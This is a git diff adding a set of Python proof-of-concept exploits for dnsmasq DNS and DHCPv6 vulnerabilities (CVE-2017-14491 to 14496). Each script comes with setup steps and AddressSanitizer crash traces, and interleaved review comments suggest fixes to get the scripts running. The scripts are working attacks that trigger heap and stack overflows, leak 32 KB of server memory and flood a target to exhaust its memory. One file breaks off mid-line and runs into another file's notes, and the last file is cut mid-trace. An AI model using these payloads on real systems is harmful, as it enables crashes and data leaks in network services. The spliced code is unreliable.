diff --git a/platforms/multiple/dos/42941.py b/platforms/multiple/dos/42941.py
new file mode 100755
index 000000000..6c8d9aece
--- /dev/null
+++ b/platforms/multiple/dos/42941.py
@@ -0,0 +1,205 @@
+'''
+Sources:
+https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py
+https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
+
+1) Build the docker and open three terminals
+
+docker build -t dnsmasq .
+docker run --rm -t -i --name dnsmasq_test dnsmasq bash
+docker cp poc.py dnsmasq_test:/poc.py
+docker exec -it bash
+docker exec -it bash
+
+2) On one terminal let’s launch attacker controlled DNS server:
+
+# python poc.py 127.0.0.2 53
+Listening at 127.0.0.2:53
+
+3) On another terminal let’s launch dnsmasq forwarding queries to attacker controlled DNS:
+
+# /testing/dnsmasq/src/dnsmasq -p 53535 --no-daemon --log-queries -S 127.0.0.2 --no-hosts --no-resolv
+dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
+dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
+dnsmasq: using nameserver 127.0.0.2#53
+dnsmasq: cleared cache
+
+4) Let’s fake a client making a request twice (or more) so we hit the dnsmasq cache:
+
+# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
+# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
+
+5) The crash might not be triggered on the first try due to the non-deterministic order of the dnsmasq cache. Restarting dnsmasq and retrying should be sufficient to trigger a crash.
+
+==1159==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62200001dd0b at pc 0x0000005105e7 bp 0x7fff6165b9b0 sp 0x7fff6165b9a8
+WRITE of size 1 at 0x62200001dd0b thread T0
+ #0 0x5105e6 in add_resource_record /test/dnsmasq/src/rfc1035.c:1141:7
+ #1 0x5127c8 in answer_request /test/dnsmasq/src/rfc1035.c:1428:11
+ #2 0x534578 in receive_query /test/dnsmasq/src/forward.c:1439:11
+ #3 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
+ #4 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
+ #5 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+ #6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
+
+0x62200001dd0b is located 0 bytes to the right of 5131-byte region [0x62200001c900,0x62200001dd0b)
+allocated by thread T0 here:
+ #0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
+ #1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
+ #2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
+ #3 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow /test/dnsmasq/src/rfc1035.c:1141:7 in add_resource_record
+Shadow bytes around the buggy address:
+ 0x0c447fffbb50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c447fffbb60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c447fffbb70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c447fffbb80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c447fffbb90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c447fffbba0: 00[03]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c447fffbbb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c447fffbbc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c447fffbbd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c447fffbbe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c447fffbbf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==1159==ABORTING
+'''
+
+#!/usr/bin/python
+#
+# Copyright 2017 Google Inc
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Authors:
+# Fermin J. Serna
+# Felix Wilhelm
+# Gabriel Campana
+# Kevin Hamacher
+# Gynvael Coldwind
+# Ron Bowes - Xoogler :/
+
+import socket
+import struct
+import sys
+
+def dw(x):
+ return struct.pack('>H', x)
+
+def udp_handler(sock_udp):
+
+ data, addr = sock_udp.recvfrom(1024)
+ print '[UDP] Total Data len recv ' + str(len(data))
+ id = struct.unpack('>H', data[0:2])[0]
+ query = data[12:]
+
+ data = dw(id) # id
+ data += dw(0x85a0) # flags
+ data += dw(1) # questions
+ data += dw(0x52) # answers
+ data += dw(0) # authoritative
+ data += dw(0) # additional
+
+ # Add the question back - we're just hardcoding it
+ data += ('\x03125\x018\x018\x018\x07in-addr\x04arpa\x00' +
+ '\x00\x0c' + # type = 'PTR'
+ '\x00\x01') # cls = 'IN'
+
+ # Add the first answer
+ data += ('\xc0\x0c' + # ptr to the name
+ '\x00\x0c' + # type = 'PTR'
+ '\x00\x01' + # cls = 'IN'
+ '\x00\x00\x00\x3d' + # ttl
+ '\x04\x00' + # size of this resource record
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x3e' + 'Z'*62 +
+ '\x0e' + 'Z'*14 +
+ '\x00')
+
+ # Add the next answer, which is written out in full
+ data += ('\xc0\x0c' + # ptr to the name
+ '\x00\x0c' + # type = 'PTR'
+ '\x00\x01' + # cls = 'IN'
+ '\x00\x00\x00\x3d' + # ttl
+ '\x00\x26' + # size of this resource record
+ '\x08DCBBEEEE\x04DDDD\x08CCCCCCCC\x04AAAA\x04BBBB\x03com\x00')
+
+ for _ in range(79):
+ data += ('\xc0\x0c' + # ptr to the name
+ '\x00\x0c' + # type = 'PTR'
+ '\x00\x01' + # cls = 'IN'
+ '\x00\x00\x00\x3d' + # ttl
+ '\x00\x02' + # size of the compressed resource record
+ '\xc4\x40') # pointer to the second record's name
+
+ data += ('\xc0\x0c' + # ptr to the name
+ '\x00\x0c' + # type = 'PTR'
+ '\x00\x01' + # cls = 'IN'
+ '\x00\x00\x00\x3d' + # ttl
+ '\x00\x11' + # size of this resource record
+ '\x04EEEE\x09DAABBEEEE\xc4\x49')
+
+ sock_udp.sendto(data, addr)
+
+if __name__ == '__main__':
+
+ if len(sys.argv) != 3:
+ print 'Usage: %s \n' % sys.argv[0]
+ sys.exit(0)
+
+ ip = sys.argv[1]
+ port = int(sys.argv[2])
+
+ sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+ sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+ sock_udp.bind((ip, port))
+ print 'Listening at %s:%d\n' % (ip, port)
+
+ while True:
+ udp_handler(sock_udp)
+
+ sock_udp.close()
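Review bot: The interpreter line `#!/usr/bin/python` sits after the closing `'''` of the prepended notes block, so despite the 100755 file mode it is not a shebang and the script cannot be executed directly; the notes should be moved below it or converted to `#` comments. The usage string `'Usage: %s \n' % sys.argv[0]` has lost its argument names, which looks like angle-bracket stripping in transit since the code reads an IP and a port from `sys.argv[1]` and `sys.argv[2]`; `'Usage: %s <ip> <port>\n'` restores it, and the two `docker exec -it bash` lines in the notes appear to have lost the container name the same way. The `print` statements are Python 2 syntax, consistent with the interpreter line, which is worth stating in the notes for anyone running it on a Python 3 host. `sock_udp.close()` after `while True:` is unreachable, and `udp_handler` rebinds the builtin name `id`.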
diff --git a/platforms/multiple/dos/42942.py b/platforms/multiple/dos/42942.py
new file mode 100755
index 000000000..0d01bc7c0
--- /dev/null
+++ b/platforms/multiple/dos/42942.py
@@ -0,0 +1,145 @@
+'''
+Sources:
+https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14492.py
+https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
+
+1) Build the docker and open two terminals
+
+docker build -t dnsmasq .
+docker run --rm -t -i --name dnsmasq_test dnsmasq bash
+docker cp poc.py dnsmasq_test:/poc.py
+docker exec -it bash
+
+2) On one terminal start dnsmasq:
+
+# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff --enable-ra
+dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
+dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
+dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
+dnsmasq-dhcp: router advertisement on fd00::
+dnsmasq-dhcp: IPv6 router advertisement enabled
+dnsmasq: reading /etc/resolv.conf
+dnsmasq: using nameserver 8.8.8.8#53
+dnsmasq: using nameserver 8.8.4.4#53
+dnsmasq: read /etc/hosts - 7 addresses
+
+
+3) On another terminal start the PoC:
+
+# python /poc.py ::1 547
+[+] sending 2050 bytes to ::1
+
+4) Dnsmasq will output the following: Segmentation fault (core dumped)
+
+==556==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000ea81 at pc 0x00000049628a bp 0x7ffd60a28a20 sp 0x7ffd60a281d0
+WRITE of size 4 at 0x61900000ea81 thread T0
+ #0 0x496289 in __interceptor_vsprintf (/test/dnsmasq/src/dnsmasq+0x496289)
+ #1 0x4964d2 in __interceptor_sprintf (/test/dnsmasq/src/dnsmasq+0x4964d2)
+ #2 0x519538 in print_mac /test/dnsmasq/src/util.c:593:12
+ #3 0x586e6a in icmp6_packet /test/dnsmasq/src/radv.c:201:4
+ #4 0x544af4 in main /test/dnsmasq/src/dnsmasq.c:1064:2
+ #5 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+ #6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
+
+0x61900000ea81 is located 0 bytes to the right of 1025-byte region [0x61900000e680,0x61900000ea81)
+allocated by thread T0 here:
+ #0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
+ #1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
+ #2 0x51cb14 in read_opts /test/dnsmasq/src/option.c:4615:16
+ #3 0x541783 in main /test/dnsmasq/src/dnsmasq.c:89:3
+ #4 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x496289) in __interceptor_vsprintf
+Shadow bytes around the buggy address:
+ 0x0c327fff9d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c327fff9d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c327fff9d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c327fff9d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c327fff9d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c327fff9d50:[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c327fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c327fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c327fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c327fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c327fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==556==ABORTING
+'''
+
+#!/usr/bin/env python
+#
+# Copyright 2017 Google Inc
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Authors:
+# Fermin J. Serna
+# Felix Wilhelm
+# Gabriel Campana
+# Kevin Hamacher
+# Gynvael Coldwind
+# Ron Bowes - Xoogler :/
+
+from struct import pack
+import socket
+import sys
+
+ND_ROUTER_SOLICIT = 133
+ICMP6_OPT_SOURCE_MAC = 1
+
+def u8(x):
+ return pack("B", x)
+
+def send_packet(data, host):
+ print("[+] sending {} bytes to {}".format(len(data), host))
+ s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
+ s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
+
+ if s.sendto(data, (host, 0)) != len(data):
+ print("[!] Could not send (full) payload")
+ s.close()
+
+if __name__ == '__main__':
+ assert len(sys.argv) == 2, "Run via {} ".format(sys.argv[0])
+ host, = sys.argv[1:]
+ pkg = b"".join([
+ u8(ND_ROUTER_SOLICIT), # type
+ u8(0), # code
+ b"X" * 2, # checksum
+ b"\x00" * 4, # reserved
+ u8(ICMP6_OPT_SOURCE_MAC), # hey there, have our mac
+ u8(255), # Have 255 MACs!
+ b"A" * 255 * 8,
+ ])
+
+ send_packet(pkg, host)
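Review bot: The documented invocation `python /poc.py ::1 547` in the header passes two arguments, but `assert len(sys.argv) == 2` at the top of `__main__` accepts exactly one (the host), so following the write-up as given trips the assertion before anything is sent; the usage string also appears to have lost its placeholder in rendering and should read `"Run via {} <host>"`. The script opens a `SOCK_RAW` ICMPv6 socket, which needs root or CAP_NET_RAW, and the crash path `icmp6_packet` → `print_mac` in the ASan trace is only reached when dnsmasq runs with `--enable-ra` as the quoted command line shows — both preconditions belong in the header comment, together with a note that the option length octet `u8(255)` (×8 = 2040 bytes of "MAC") is what overruns the 1025-byte region ASan reports. The `b"X" * 2` placeholder checksum presumably relies on the kernel filling in the ICMPv6 checksum for raw `IPPROTO_ICMPV6` sockets (Linux does this by default); a one-line comment would stop someone "fixing" it. The `#!/usr/bin/env python` line sits after the docstring and is therefore an ordinary comment, not a shebang.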
diff --git a/platforms/multiple/dos/42943.py b/platforms/multiple/dos/42943.py
new file mode 100755
index 000000000..b58e62513
--- /dev/null
+++ b/platforms/multiple/dos/42943.py
@@ -0,0 +1,151 @@
+'''
+Sources:
+https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py
+https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
+
+1) Build the docker and open two terminals
+
+docker build -t dnsmasq .
+docker run --rm -t -i --name dnsmasq_test dnsmasq bash
+docker cp poc.py dnsmasq_test:/poc.py
+docker exec -it bash
+
+2) On one terminal start dnsmasq:
+
+# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff
+dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
+dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
+dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
+dnsmasq: reading /etc/resolv.conf
+dnsmasq: using nameserver 8.8.8.8#53
+dnsmasq: using nameserver 8.8.4.4#53
+dnsmasq: read /etc/hosts - 7 addresses
+
+
+3) On another terminal start the PoC:
+
+# python /poc.py ::1 547
+[+] sending 70 bytes to ::1:547
+
+4) Dnsmasq will output the following: Segmentation fault (core dumped)
+
+==33==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcbef81470 at pc 0x0000004b5408 bp 0x7ffcbef81290 sp 0x7ffcbef80a40
+WRITE of size 30 at 0x7ffcbef81470 thread T0
+ #0 0x4b5407 in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b5407)
+ #1 0x575d38 in dhcp6_maybe_relay /test/dnsmasq/src/rfc3315.c:211:7
+ #2 0x575378 in dhcp6_reply /test/dnsmasq/src/rfc3315.c:103:7
+ #3 0x571080 in dhcp6_packet /test/dnsmasq/src/dhcp6.c:233:14
+ #4 0x544a82 in main /test/dnsmasq/src/dnsmasq.c:1061:2
+ #5 0x7f93e5da62b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+ #6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
+
+Address 0x7ffcbef81470 is located in stack of thread T0 at offset 208 in frame
+ #0 0x57507f in dhcp6_reply /test/dnsmasq/src/rfc3315.c:78
+
+ This frame has 1 object(s):
+ [32, 208) 'state' <== Memory access at offset 208 overflows this variable
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
+ (longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: stack-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x4b5407) in __asan_memcpy
+Shadow bytes around the buggy address:
+ 0x100017de8230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x100017de8240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x100017de8250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x100017de8260: f1 f1 f1 f1 00 00 f3 f3 00 00 00 00 00 00 00 00
+ 0x100017de8270: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00
+=>0x100017de8280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f3]f3
+ 0x100017de8290: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
+ 0x100017de82a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x100017de82b0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
+ 0x100017de82c0: 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2
+ 0x100017de82d0: 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==33==ABORTING
+'''
+
+#!/usr/bin/python
+#
+# Copyright 2017 Google Inc
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Authors:
+# Fermin J. Serna
+# Felix Wilhelm
+# Gabriel Campana
+# Kevin Hamacher
+# Gynvael Coldwind
+# Ron Bowes - Xoogler :/
+
+from struct import pack
+import sys
+import socket
+
+def send_packet(data, host, port):
+ print("[+] sending {} bytes to {}:{}".format(len(data), host, port))
+ s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
+
+ s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
+ if s.sendto(data, (host, port)) != len(data):
+ print("[!] Could not send (full) payload")
+ s.close()
+
+def u8(x):
+ return pack("B", x)
+
+def u16(x):
+ return pack("!H", x)
+
+def gen_option(option, data, length=None):
+ if length is None:
+ length = len(data)
+
+ return b"".join([
+ u16(option),
+ u16(length),
+ data
+ ])
+
+if __name__ == '__main__':
+ assert len(sys.argv) == 3, "{} ".format(sys.argv[0])
+ pkg = b"".join([
+ u8(12), # DHCP6RELAYFORW
+ u16(0x0313), u8(0x37), # transaction ID
+ b"_" * (34 - 4),
+ # Option 79 = OPTION6_CLIENT_MAC
+ # Moves argument into char[DHCP_CHADDR_MAX], DHCP_CHADDR_MAX = 16
+ gen_option(79, "A" * 74 + pack("
+The poc will create a response.bin file with 32k bytes worth of ram, beginning at the buffer + 38.
+
+'''
+
+#!/usr/bin/env python
+#
+# Copyright 2017 Google Inc
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Authors:
+# Fermin J. Serna
+# Felix Wilhelm
+# Gabriel Campana
+# Kevin Hamacher
+# Gynvael Coldwind
+# Ron Bowes - Xoogler :/
+from binascii import unhexlify
+from struct import pack
+import socket
+import sys
+
+# num bytes to leak. < 0xFFFF, exact upper limit not tested.
+N_BYTES = 0x8000
+
+def send_packet(data, host, port):
+ print("[+] sending {} bytes to [{}]:{}".format(len(data), host, port))
+ s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
+
+ s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
+ if s.sendto(data, (host, port)) != len(data):
+ print("[!] Could not send (full) payload")
+
+ s.close()
+
+def u8(x):
+ return pack("B", x)
+
+def u16(x):
+ return pack("!H", x)
+
+def gen_option(option, data, length=None):
+ if length is None:
+ length = len(data)
+
+ return b"".join([
+ u16(option),
+ u16(length),
+ data
+ ])
+
+def inner_pkg(duid):
+ OPTION6_SERVER_ID = 2
+ return b"".join([
+ u8(5), # Type = DHCP6RENEW
+ u8(0), u16(1337), # ID
+ gen_option(OPTION6_SERVER_ID, duid),
+ gen_option(1, "", length=(N_BYTES - 8 - 18)) # Client ID
+ ])
+
+if __name__ == '__main__':
+ assert len(sys.argv) == 2, "{} ".format(sys.argv[0])
+ # No automated way to obtain a duid, sorry. Not a programming contest after all.
+ host, duid = sys.argv[1:]
+ duid = unhexlify(duid)
+ assert len(duid) == 14
+ pkg = b"".join([
+ u8(12), # DHCP6RELAYFORW
+ '?',
+ # Client addr
+ '\xFD\x00',
+ '\x00\x00' * 6,
+ '\x00\x05',
+ '_' * (33 - 17), # Skip random data.
+ # Option 9 - OPTION6_RELAY_MSG
+ gen_option(9, inner_pkg(duid), length=N_BYTES),
+ ])
+
+ # Setup receiving port
+ s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
+ s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, N_BYTES)
+ s.bind(('::', 547))
+
+ # Send request
+ send_packet(pkg, host, 547)
+
+ # Dump response
+ with open('response.bin', 'wb') as f:
+ f.write(s.recvfrom(N_BYTES)[0])
diff --git a/platforms/multiple/dos/42945.py b/platforms/multiple/dos/42945.py
new file mode 100755
index 000000000..1dead3cfa
--- /dev/null
+++ b/platforms/multiple/dos/42945.py
@@ -0,0 +1,61 @@
+'''
+Sources:
+https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py
+https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
+
+dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.
+
+'''
+
+#!/usr/bin/python
+#
+# Copyright 2017 Google Inc
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Authors:
+# Fermin J. Serna
+# Felix Wilhelm
+# Gabriel Campana
+# Kevin Hamacher
+# Gynvael Coldwin
+# Ron Bowes - Xoogler :/
+
+import socket
+import sys
+
+
+def oom():
+ data = '''01 0d 08 1b 00 01 00 00 00 00 00 02 00 00 29 04
+00 00 29 00 00 00 03 00 00 01 13 00 08 01 13 79
+00 00 00 00 00
+ '''.replace(' ', '').replace('\n', '').decode('hex')
+ data = data.replace('\x00\x01\x13\x00', '\x7f\x00\x00\x01')
+ return data
+
+if __name__ == '__main__':
+ if len(sys.argv) != 3:
+ print 'Usage: %s ' % sys.argv[0]
+ sys.exit(0)
+
+ ip = sys.argv[1]
+ port = int(sys.argv[2])
+
+ packet = oom()
+
+ s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+ s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
+ while True:
+ s.sendto(packet, (ip, port))
+ #break
+ s.close()
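Review bot: The `while True:` send loop at the end of `__main__` has no exit condition (the only `break` is commented out), so `s.close()` is unreachable and the PoC floods the target until killed; given the function is named `oom` and the bug is a missing `free()`, the leak presumably needs many packets, so bound the loop explicitly, e.g. `for _ in range(int(sys.argv[3]) if len(sys.argv) > 3 else 100000): s.sendto(packet, (ip, port))`, and say in the header that memory grows per query rather than on a single packet. `oom()` also relies on Python 2 only idioms — `'...'.decode('hex')` and the bare `print` statement; `binascii.unhexlify` (or `bytes.fromhex`) and `print(...)` would run under either interpreter. The usage branch exits with `sys.exit(0)` on a bad argument count, which reports success to a calling shell; `sys.exit(1)` is the conventional choice. The `replace('\x00\x01\x13\x00', '\x7f\x00\x00\x01')` patch to the raw bytes deserves a comment naming the field it rewrites — it looks like an address inside the EDNS0 option, but that is not evident from the blob.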
diff --git a/platforms/multiple/dos/42946.py b/platforms/multiple/dos/42946.py
new file mode 100755
index 000000000..b8bb4de93
--- /dev/null
+++ b/platforms/multiple/dos/42946.py
@@ -0,0 +1,99 @@
+'''
+Sources:
+https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py
+https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
+
+dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.
+
+=================================================================
+==2215==ERROR: AddressSanitizer: negative-size-param: (size=-4)
+ #0 0x4b55be in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b55be)
+ #1 0x59a70e in add_pseudoheader /test/dnsmasq/src/edns0.c:164:8
+ #2 0x59bae8 in add_edns0_config /test/dnsmasq/src/edns0.c:424:12
+ #3 0x530b6b in forward_query /test/dnsmasq/src/forward.c:407:20
+ #4 0x534699 in receive_query /test/dnsmasq/src/forward.c:1448:16
+ #5 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
+ #6 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
+ #7 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+ #8 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
+
+0x62200001ca2e is located 302 bytes inside of 5131-byte region [0x62200001c900,0x62200001dd0b)
+allocated by thread T0 here:
+ #0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
+ #1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
+ #2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
